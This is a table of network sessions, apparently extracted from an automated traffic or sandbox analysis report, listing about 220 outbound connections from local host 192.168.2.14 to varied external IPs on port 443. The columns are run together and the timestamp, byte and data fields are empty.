                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13316192.168.2.145872650.22.170.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13317192.168.2.1458820221.130.237.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13318192.168.2.1457246201.40.7.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13319192.168.2.1458758172.15.188.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13320192.168.2.144695453.64.58.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13321192.168.2.1442514187.55.240.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13322192.168.2.144925887.202.152.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13323192.168.2.1449852104.37.117.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13324192.168.2.1459456121.156.209.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13325192.168.2.1452404216.199.29.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13326192.168.2.1444452211.161.10.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13327192.168.2.1433750149.121.49.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13328192.168.2.1437192212.102.205.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13329192.168.2.14455909.133.240.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13330192.168.2.1442624112.247.188.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13331192.168.2.144601682.72.142.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13332192.168.2.1457676195.2.113.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13333192.168.2.145344423.210.205.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13334192.168.2.1446816153.93.114.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13335192.168.2.143419825.212.113.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13336192.168.2.1441668206.213.62.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13337192.168.2.1449420101.188.234.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13338192.168.2.1455198184.229.252.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13339192.168.2.1440282147.112.1.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13340192.168.2.145529068.200.180.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13341192.168.2.1459308105.255.201.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13342192.168.2.143333491.237.144.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13343192.168.2.1435658210.79.28.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13344192.168.2.1446688184.6.52.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13345192.168.2.1435684105.34.101.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13346192.168.2.1446068168.221.216.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13347192.168.2.145780213.146.52.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13348192.168.2.1458664101.141.167.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13349192.168.2.1452974114.117.197.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13350192.168.2.1458432136.52.101.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13351192.168.2.143637869.229.29.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13352192.168.2.1448826197.25.161.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13353192.168.2.1436744162.96.198.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13354192.168.2.1460258203.32.76.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13355192.168.2.144391684.14.230.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13356192.168.2.145562290.52.53.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13357192.168.2.1442974213.95.216.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13358192.168.2.1436758113.148.55.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13359192.168.2.1454068171.231.39.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13360192.168.2.1454830125.148.116.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13361192.168.2.1454394190.94.208.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13362192.168.2.145887041.19.243.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13363192.168.2.1459644132.200.250.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13364192.168.2.1451816117.238.5.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13365192.168.2.1443598148.171.39.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13366192.168.2.143566679.169.109.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13367192.168.2.1438028169.126.197.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13368192.168.2.1446130113.45.173.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13369192.168.2.1460088195.38.55.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13370192.168.2.145503469.35.175.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13371192.168.2.144687478.125.22.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13372192.168.2.144799841.117.18.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13373192.168.2.1455736176.87.43.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13374192.168.2.1444918187.147.137.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13375192.168.2.1453050201.94.103.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13376192.168.2.144605461.108.67.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13377192.168.2.1439420106.211.153.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13378192.168.2.14483408.67.155.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13379192.168.2.1440278177.217.18.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13380192.168.2.1447424203.105.156.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13381192.168.2.1455956129.240.244.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13382192.168.2.145529299.21.8.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13383192.168.2.145758860.207.206.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13384192.168.2.145913489.59.20.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13385192.168.2.144770458.145.56.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13386192.168.2.1444216145.13.74.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13387192.168.2.143372478.75.247.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13388192.168.2.1439260174.87.119.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13389192.168.2.144159672.168.224.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13390192.168.2.1448606145.79.152.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13391192.168.2.146090091.201.121.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13392192.168.2.1447598138.70.104.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13393192.168.2.144161288.45.113.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13394192.168.2.1436470138.80.164.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13395192.168.2.1456952117.92.61.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13396192.168.2.145335027.231.127.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13397192.168.2.145693872.7.122.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13398192.168.2.1435312128.155.234.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13399192.168.2.145707243.87.176.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13400192.168.2.144246641.247.32.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13401192.168.2.144698061.226.105.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13402192.168.2.144856094.103.166.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13403192.168.2.143616451.33.210.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13404192.168.2.144198835.30.42.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13405192.168.2.1436252130.16.239.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13406192.168.2.144162843.16.45.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13407192.168.2.1458998169.19.207.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13408192.168.2.14544849.74.192.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13409192.168.2.1458252107.244.187.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13410192.168.2.1435088142.159.92.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13411192.168.2.144798893.97.252.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13412192.168.2.1443734179.211.98.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13413192.168.2.1459156184.67.193.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13414192.168.2.145744658.213.173.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13415192.168.2.14529342.70.86.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13416192.168.2.1458108174.96.213.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13417192.168.2.144789084.24.113.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13418192.168.2.1440758132.108.148.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13419192.168.2.1452622161.47.52.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13420192.168.2.144179050.118.27.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13421192.168.2.143310646.139.102.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13422192.168.2.145873459.96.49.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13423192.168.2.144699062.37.206.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13424192.168.2.1452362147.34.60.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13425192.168.2.1437752163.78.48.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13426192.168.2.1455968100.190.9.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13427192.168.2.145055095.100.182.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13428192.168.2.1454690162.129.84.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13429192.168.2.143448886.17.111.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13430192.168.2.145205012.144.244.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13431192.168.2.1446674148.138.93.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13432192.168.2.144034479.84.147.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13433192.168.2.1447634124.127.7.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13434192.168.2.143783432.217.159.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13435192.168.2.1448436202.129.64.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13436192.168.2.1446850219.75.50.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13437192.168.2.145530039.245.100.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13438192.168.2.145015869.118.221.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13439192.168.2.1454370148.110.247.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13440192.168.2.1451354100.39.203.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13441192.168.2.1433484181.187.132.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13442192.168.2.144394659.51.78.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13443192.168.2.1446802128.130.25.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13444192.168.2.145423814.66.16.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13445192.168.2.1448012102.23.188.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13446192.168.2.145471418.53.58.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13447192.168.2.1446158142.86.188.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13448192.168.2.1448856146.222.7.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13449192.168.2.145703491.86.118.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13450192.168.2.145894048.32.45.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13451192.168.2.1457434154.254.17.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13452192.168.2.145022043.163.248.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13453192.168.2.1435136220.108.239.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13454192.168.2.1435264155.167.34.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13455192.168.2.145357286.121.213.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13456192.168.2.1447988174.46.166.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13457192.168.2.144175832.107.115.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13458192.168.2.1447054146.151.100.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13459192.168.2.1441146216.244.76.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13460192.168.2.1440016170.242.38.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13461192.168.2.1446106131.21.95.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13462192.168.2.145146468.83.253.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13463192.168.2.14380242.248.2.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13464192.168.2.1438408161.189.165.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13465192.168.2.1460852209.47.247.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13466192.168.2.144334225.158.97.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13467192.168.2.1437088136.255.166.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13468192.168.2.1434460144.60.12.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13469192.168.2.143305659.191.70.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13470192.168.2.1459680171.145.47.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13471192.168.2.145270439.240.225.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13472192.168.2.1433498165.56.252.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13473192.168.2.1458658177.183.133.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13474192.168.2.144600420.183.249.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13475192.168.2.1434908223.61.28.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13476192.168.2.1446368163.84.199.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13477192.168.2.1451578218.185.40.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13478192.168.2.1443330143.178.17.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13479192.168.2.146004280.118.252.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13480192.168.2.1460454138.177.244.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13481192.168.2.1438706154.25.120.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13482192.168.2.1454966161.140.108.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13483192.168.2.1442306159.25.237.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13484192.168.2.145115092.16.200.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13485192.168.2.145218683.202.165.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13486192.168.2.144377069.120.0.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13487192.168.2.145266281.209.169.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13488192.168.2.144398679.32.25.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13489192.168.2.143619470.35.140.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13490192.168.2.143571892.50.47.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13491192.168.2.143639639.63.44.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13492192.168.2.1457664122.97.33.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13493192.168.2.144784662.252.223.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13494192.168.2.1436508195.173.49.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13495192.168.2.1442690160.115.129.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13496192.168.2.145075465.71.30.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13497192.168.2.145718280.239.5.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13498192.168.2.145952443.14.246.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13499192.168.2.1442522220.170.137.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13500192.168.2.145023280.68.71.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13501192.168.2.145001436.98.57.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13502192.168.2.1436800162.187.71.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13503192.168.2.1450008164.131.31.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13504192.168.2.1439626112.16.242.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13505192.168.2.1453988177.239.208.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13506192.168.2.1444072192.42.20.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13507192.168.2.1446282201.158.202.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13508192.168.2.1458300117.179.227.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13509192.168.2.143465819.240.39.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13510192.168.2.1457192105.75.5.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13511192.168.2.14377145.225.238.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13512192.168.2.1437270202.114.3.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13513192.168.2.1437246205.113.2.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13514192.168.2.1437128173.166.136.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13515192.168.2.1435532150.242.160.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13516192.168.2.1452306122.7.202.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13517192.168.2.14576482.168.28.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13518192.168.2.1447430204.193.140.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13519192.168.2.144299832.167.49.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13520192.168.2.144901448.163.123.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13521192.168.2.146005090.129.2.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13522192.168.2.144401648.217.131.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13523192.168.2.144451470.84.83.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13524192.168.2.1433902162.243.46.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13525192.168.2.1437526183.59.152.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13526192.168.2.144672849.115.99.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13527192.168.2.1457046118.220.15.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13528192.168.2.145437858.30.177.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13529192.168.2.1458340117.118.141.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13530192.168.2.1436122211.142.4.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13531192.168.2.144441895.188.154.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13532192.168.2.1454072120.145.51.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13533192.168.2.1441994204.128.73.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13534192.168.2.1449242120.172.254.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13535192.168.2.1434542192.106.62.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13536192.168.2.1459686135.29.3.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13537192.168.2.1447102168.183.166.145443
